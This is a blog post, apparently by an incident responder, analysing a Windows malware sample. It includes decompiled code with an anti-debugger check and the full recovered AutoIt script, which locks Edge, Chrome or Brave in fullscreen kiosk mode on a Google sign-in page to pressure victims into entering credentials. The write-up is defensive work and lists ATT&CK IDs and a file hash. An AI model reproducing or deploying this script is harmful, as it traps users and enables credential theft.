Avatar
An incident responder who's seeking opportunities to work in technology company!
Operator in Cookie Han Hoan
Admin in Cyber Mely, CyberSpace
Forensic at @World Wide Flags

Malware Analysis - Real Case 4

Hi everyone, this article is the next one I want to share to all of you. I analysed this malware yesterday, and I just saw a post of Whitehat about it, so I think it’s really important that I need to share how I analysed this malware so that you can know how to prevent from it! Let’s go!

Sample: click here to see it

First, I checked malware information:

image

There’s still nothing interesting, next I used IDA to analyse:

image

sub_402A32(lpCmdLine); is the most suspicious thing, I checked it immediately and I found an interesting thing:

int __stdcall sub_402A32(void *a1)
{
  char v1; // bl
  int v2; // ecx
  HWND ForegroundWindow; // eax
  const WCHAR *v5; // [esp-10h] [ebp-20048h]
  const WCHAR *v6; // [esp-Ch] [ebp-20044h]
  char v7; // [esp+11h] [ebp-20027h] BYREF
  char v8; // [esp+12h] [ebp-20026h]
  char v9; // [esp+13h] [ebp-20025h] BYREF
  LPWSTR FilePart; // [esp+14h] [ebp-20024h] BYREF
  LPCWSTR lpParameters[4]; // [esp+18h] [ebp-20020h] BYREF
  LPCWSTR lpFile[4]; // [esp+28h] [ebp-20010h] BYREF
  WCHAR Buffer[32768]; // [esp+38h] [ebp-20000h] BYREF
  WCHAR v14[32768]; // [esp+10038h] [ebp-10000h] BYREF

  sub_40A961(lpFile);
  v1 = 0;
  v7 = 0;
  v8 = 0;
  GetCurrentDirectoryW(0x7FFFu, Buffer);
  sub_402E37(a1, &v9);
  if ( IsDebuggerPresent() )
  {
    MessageBoxA(0, "This is a third-party compiled AutoIt script.", Caption, 0x10u);
    return sub_40988F(lpFile);
  }
  if ( dword_4D1400 )
  {
    if ( dword_4D1400 == 1 )
    {
      sub_4075AC(1, dword_4D1408, -1);
      byte_4D2392 = byte_4D1364;
      goto LABEL_6;
    }
    if ( (unsigned __int8)sub_402DE3(&lpFileName, &dword_4D1400, v2, &v7) )
    {
      v8 = HIBYTE(word_4D2390);
      byte_4D1404 = word_4D2390;
      GetFullPathNameW(lpFileName, 0x7FFFu, v14, &FilePart);
      sub_406B57(FilePart);
      v1 = v7;
LABEL_6:
      if ( sub_401CD0(&lpFileName, dword_4D1400) )
      {
        sub_403D1B(&word_4D2390);
        SetCurrentDirectoryW(Buffer);
        dword_4D135C = 1;
        return sub_40988F(lpFile);
      }
      if ( v8 != 1 || (unsigned __int8)sub_461663() || v9 )
      {
        sub_402B83();
        sub_402C63();
        if ( !byte_4D1404 )
          sub_403837(&dword_4D1990);
        sub_40D760(1);
        if ( !byte_4D1404 )
          sub_4030F2(&dword_4D1990);
      }
      else
      {
        sub_403A5A(lpFile);
        sub_409CB3(&unk_4C2224);
        if ( v1 )
        {
          sub_4033C6("\"");
          sub_406350(&lpFileName);
          sub_4033C6("\"");
        }
        else
        {
          sub_4033C6(a1);
        }
        v6 = lpParameters[0];
        v5 = lpFile[0];
        ForegroundWindow = GetForegroundWindow();
        ShellExecuteW(ForegroundWindow, L"runas", v5, v6, Buffer, 1);
        sub_40988F(lpParameters);
      }
      sub_403D1B(&word_4D2390);
      goto LABEL_13;
    }
    dword_4D135C = 1;
  }
  else
  {
    dword_4D135C = -1;
  }
LABEL_13:
  SetCurrentDirectoryW(Buffer);
  return sub_40988F(lpFile);
}

In this function, the first condition will check if there’s any debugger was used, if yes it will print “This is a third-party compiled AutoIt script.”. This is one of the techniques that was used to antt debug, and if you want to debug it without being catched by this condition, you can install Scyllahide - a plugin was created to anti anti-debug. But in this case it’s not necessary, because there’s a good thing to look. Because of the string This is a third-party compiled AutoIt script., I’ve known that it was compiled by AutoIT, and there’s a tool help us analyse this type of malware. Open it, import exe file and this is what I got:

image

Local $url = "https://accounts.google.com/ServiceLogin?service=accountsettings&continue=https://myaccount.google.com/signinoptions/password"
Local $primarybrowser = ""
Local $primaryclass = ""
If FileExists("C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe") Or FileExists("C:\Program Files\Microsoft\Edge\Application\msedge.exe") Then
    $primarybrowser = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
    $primaryclass = "[CLASS:Chrome_WidgetWin_1]"
ElseIf FileExists("C:\Program Files (x86)\Google\Chrome\Application\chrome.exe") Or FileExists("C:\Program Files\Google\Chrome\Application\chrome.exe") Then
    $primarybrowser = "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
    $primaryclass = "[CLASS:Chrome_WidgetWin_1]"
ElseIf FileExists("C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe") Or FileExists("C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\brave.exe") Then
    $primarybrowser = "C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe"
    $primaryclass = "[CLASS:Chrome_WidgetWin_1]"
Else
    Exit
EndIf
If StringInStr($primarybrowser, "msedge.exe") Then
    Run($primarybrowser & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
Else
    Run($primarybrowser & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
EndIf
Sleep(0x7d0)
Local $hwnd = WinGetHandle($primaryclass)
While 0x1
    If Not WinExists($hwnd) Then
        If StringInStr($primarybrowser, "msedge.exe") Then
            Run($primarybrowser & " --kiosk --edge-kiosk-type=fullscreen --no-first-run --disable-features=TranslateUI --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
        Else
            Run($primarybrowser & " --kiosk --disable-features=TranslateUI --disable-infobars --no-first-run --disable-popup-blocking --disable-extensions --no-default-browser-check --app=" & $url)
        EndIf
        Sleep(0x7d0)
        $hwnd = WinGetHandle($primaryclass)
    EndIf
    WinSetOnTop($hwnd, "", 0x1)
    If Not WinActive($hwnd) Then
        WinActivate($hwnd)
    EndIf
    Sleep(0x1f4)
WEnd

Let’s analyse step by step:

  • First, they created $url variable which redirects you to Google signup screen
  • Second, there’re 3 conditions to check which browser in our computer: msedge, chrome or brave
  • After locating the browser, it was executed with specific command-line options to optimize the kiosk experience. The –kiosk option launched the browser directly into kiosk mode, while –edge-kiosk-type=fullscreen ensured that this mode occupied the entire screen. Additional options such as –no-first-run and –disable-popup-blocking were included to disable certain features, creating a more streamlined and user-focused kiosk environment.
  • The script then pauses for a moment using Sleep(0x7d0) (which is 2000 milliseconds or 2 seconds) to allow the browser to start.
  • It retrieves the handle of the browser window using WinGetHandle($primaryclass).
  • The script enters an infinite while loop (While 0x1).
  • If the browser window no longer exists (If Not WinExists($hwnd)), it reruns the browser with the same conditions as before and reacquires the window handle.
  • The script uses WinSetOnTop($hwnd, “”, 0x1) to keep the browser window on top of all other windows.
  • If the browser window is not active, it activates the window using WinActivate($hwnd).
  • The script pauses briefly (500 milliseconds) in each iteration to avoid consuming too much CPU.
  • The loop continues indefinitely, ensuring the browser remains open, on top, and active in kiosk mode.

Because of kiosk mode, many people cannot escape from signup screen, they don’t have choice except signup their account, and in that time attackers can do many things: steal sensitive data…


Summary:
MITRE ATT&CK: T1036.003, T1012, T1082.
IOC: 1cf0747ce1310fd989b24a93d2108784efb003948fdec1f7e64479213075cb90.

Thank you for reading my blog! See you in the next article in the future. Bye 🫀🫀🫀!!

all tags